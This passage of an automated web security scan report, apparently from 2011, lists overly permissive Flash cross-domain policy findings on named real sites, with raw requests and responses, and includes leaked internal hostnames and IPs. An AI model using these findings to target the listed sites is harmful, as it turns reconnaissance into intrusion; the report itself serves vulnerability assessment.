Host:	http://statse.webtrendslive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:8bf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:45 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.70. http://tags.bluekai.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 14:56:53 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "32883cc-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

4.71. http://tf.nexac.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tf.nexac.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: tf.nexac.com

Response

4.72. http://ttwbs.channelintelligence.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ttwbs.channelintelligence.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ttwbs.channelintelligence.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:39 GMT
Server: Jetty(6.1.22)
Cache-Control: max-age=86400
Content-Length: 441
content-type: application/xml
Age: 61
Via: 1.1 iad061108 (MII-APC/2.1)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.73. http://wingateweb.112.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wingateweb.112.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: wingateweb.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:56:54 GMT
Server: Omniture DC/2.0.0
xserver: www125
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.74. http://ad.wsod.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 17:05:46 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "447038-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...

4.75. http://adadvisor.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://adadvisor.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:04 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

4.76. http://ads.adsonar.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ads.adsonar.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adsonar.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:56:44 GMT
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"
Accept-Ranges: bytes
Content-Length: 2621
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=150, max=896
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

4.77. http://ads1.msn.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ads1.msn.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads1.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Date: Tue, 06 Sep 2011 15:00:14 GMT
Content-Length: 616
Content-Type: text/xml
Last-Modified: Thu, 12 May 2011 21:35:14 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Expires: Sat, 30 Jun 2012 12:49:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="global.msads.net" />
<allow-access-from domain="msnbcmedia.msn.com" />
<allow-access-from domain="*.msnbc.msn.com" />
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn-int.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn-int.com" secure="false" />
...[SNIP]...

4.78. http://adx.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://adx.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=ISO-8859-1
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Tue, 06 Sep 2011 17:05:55 GMT
Expires: Wed, 07 Sep 2011 17:05:55 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.79. http://assets1.csc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://assets1.csc.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: assets1.csc.com

Response

HTTP/1.0 200 OK
x-amz-id-2: FcnyXqPak36cLwKPUi1HA56iJfWYFNUtUM95uLnVRd/JmKoOs3CeXukpfMrEdpbc
x-amz-request-id: 9A44AC709A32B889
Date: Tue, 06 Sep 2011 15:57:47 GMT
Last-Modified: Thu, 03 Jun 2010 19:56:13 GMT
ETag: "31616154d66e52c8a5f79d34e7fa229a"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 256
Server: AmazonS3
X-Cache: Miss from cloudfront
X-Amz-Cf-Id: ee9cad8e5f3b5b709b20cb0f6ea0020c8921721e47f4c95b539bdba55cfb09358c2ee8f9cae47b93,41028218a4b1860c2975b885931132835d738f7494f9734ced53465bad11a658a47fd29a3b9917d4
Via: 1.0 db26aad8eddbf74ac3abe77abd5de63f.cloudfront.net:11180 (CloudFront), 1.0 23d5f9ecd89e26f0c254accbbb676a22.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.csc.com" />
<allow-access-
...[SNIP]...

4.80. http://blogs.oracle.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://blogs.oracle.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: blogs.oracle.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Last-Modified: Sat, 16 Jul 2011 10:06:38 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=214587153+0;age=2083326;ecid=51608497101082732,0:1)
Content-Length: 392
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-onl
...[SNIP]...
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.sun.com"/>
...[SNIP]...

4.81. http://bstats.adbrite.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bstats.adbrite.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bstats.adbrite.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Content-Length: 398
Server: XPEHb/1.0
Accept-Ranges: none
Date: Tue, 06 Sep 2011 15:32:13 GMT

<?xml version="1.0" encoding="UTF-8"?>

<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

4.82. http://channelsun.sun.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://channelsun.sun.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: channelsun.sun.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/2.5
Server: Sun GlassFish Enterprise Server v2.1
ETag: W/"872-1302718369000"
Last-Modified: Wed, 13 Apr 2011 18:12:49 GMT
Content-Type: application/xml
Content-Length: 872
Date: Tue, 06 Sep 2011 16:13:10 GMT

<cross-domain-policy>
<allow-access-from domain="*.oracle.com"/>
<allow-access-from domain="oracle.com"/>
<allow-access-from domain="www.oracle.com"/>
<allow-access-from domain="presenter.oracle.com"/>
<allow-access-from domain="streaming.oracle.com"/>
<allow-access-from domain="web148.oracle.com"/>
<allow-access-from domain="http://72.47.210.156"/>
<allow-access-from domain="http://216.70.88.224"/>
<allow-access-from domain="events-mktas.oracle.com"/>
<allow-access-from domain="events-mktap.oracle.com"/>
<allow-access-from domain="eventreg.oracle.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="www.oracleimg.com"/>
<allow-access-from domain="medianetwork.oracle.com"/>
<allow-access-from domain="*.akamai.com"/>
<allow-access-from domain="*.omniture.com"/>
...[SNIP]...

4.83. https://cms.paypal.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://cms.paypal.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cms.paypal.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 10 Jun 2008 20:10:41 GMT
Accept-Ranges: bytes
Content-Length: 312
Content-Type: application/xml
Expires: Tue, 06 Sep 2011 17:06:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 17:06:25 GMT
Connection: close
Set-Cookie: BIGipServerpool_cms.paypal.com_443=455494154.26702.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.paypal.com" />
<allow-access-from domain="*.ebay.com" />
<allow-access-from domain="*.paypalobjects.com" />
...[SNIP]...

4.84. http://cnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: cnbc.com
Proxy-Connection: keep-alive
Referer: http://media.cnbc.com/i/CNBC/Components/Promos/_app/promoBox_auto.swf?delay=0&config=24596694&v=7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315339052241; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CBlog%25257CAllT%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/id/15837856/site/14081545/%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Accept-Ranges: bytes
ETag: "0ff4d5ae31fcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Connection: Keep-Alive
Date: Tue, 06 Sep 2011 14:57:41 GMT
Age: 2384
Content-Length: 3839

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.atdmt.com"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.85. http://cvs.shoplocal.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cvs.shoplocal.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cvs.shoplocal.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 12 Aug 2011 18:31:01 GMT
Accept-Ranges: bytes
ETag: "7b77bcfc1d59cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT"
Content-Length: 5330
Date: Tue, 06 Sep 2011 17:06:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.crossmediaservices.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.shoplocal.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.target.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.publix.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.homedepot.com" />
<allow-access-from domain="weeklyad.lowes.com" />
<allow-access-from domain="instorespecials.staples.com" />
<allow-access-from domain="weeklyad.staples.com" />
<allow-access-from domain="weeklyad.cvs.com" />
<allow-access-from domain="weeklyad.circuitcity.com" />
<allow-access-from domain="www.jcpstoreads.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="192.168.0.251" />
<allow-access-from domain="10.200.1.53" />
<allow-access-from domain="10.200.1.59" />
<allow-access-from domain="10.200.1.61" />
<allow-access-from domain="v-devweb1" />
<allow-access-from domain="d-pshahrava" />
<allow-access-from domain="192.168.0.9" />
<allow-access-from domain="192.168.0.10" />
<allow-access-from domain="192.168.0.111" />
<allow-access-from domain="192.168.0.36" />
<allow-access-from domain="172.16.200.22" />
<allow-access-from domain="172.16.200.23" />
<allow-access-from domain="d-dmoore2" />
<allow-access-from domain="vqascweb1" />
<allow-access-from domain="vqascweb2" />
<allow-access-from domain="localhost" />
<allow-access-from domain="devweb1" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.pointroll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.pointroll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="data.pointroll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="speed.pointroll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="mirror.pointroll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="geo.pointroll.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="ad.doubleclick.net" />
<allow-access-from domain="m.doubleclick.net" />
<allow-access-from domain="m2.doubleclick.net" />
<allow-access-from domain="m3.doubleclick.net" />
<allow-access-from domain="m.2mdn.net" />
<allow-access-from domain="m1.2mdn.net" />
<allow-access-from domain="m2.2mdn.net" />
<allow-access-from domain="creatives.doubleclick.net" />
<allow-access-from domain="motifcdn2.doubleclick.net" />
<allow-access-from domain="motifcdn.doubleclick.net" />
<allow-access-from domain="*.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="dfa.doubleclick.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.ippixel.com" />
<allow-access-from domain="www.wearepixel.com" />
<allow-access-from domain="www.yourlexusdealer.com" />
<allow-access-from domain="yourlexusdealer.com" />
<allow-access-from domain="devcpd1.yourlexusdealer.com" />
<allow-access-from domain="staging.yourlexusdealer.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="zshalla.desktop.amazon.com" />
<allow-access-from domain="snowbank.amazon.com" />
<allow-access-from domain="weeklyad.amazon.com" />
<allow-access-from domain="d-trobertson" secure="false"/>
...[SNIP]...
<allow-access-from domain="vmu-shd-fb1.sf.akqa.com"/>
<allow-access-from domain="tarjoukset.hs.fi" />
<allow-access-from domain="8.17.173.144" />
<allow-access-from domain="www.targetweeklyadapps.com" />
<allow-access-from domain="*.intellitxt.com" />
<allow-access-from domain="*.richrelevance.com" />
<allow-access-from domain="devcpd2.yourlexusdealer.com" />
<allow-access-from domain="dev.big5.adhostclient.com" />
<allow-access-from domain="big5sportinggoods.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.big5sportinggoods.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.sears.com" />
<allow-access-from domain="*.kmart.com" />
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.designkitchen.com" />
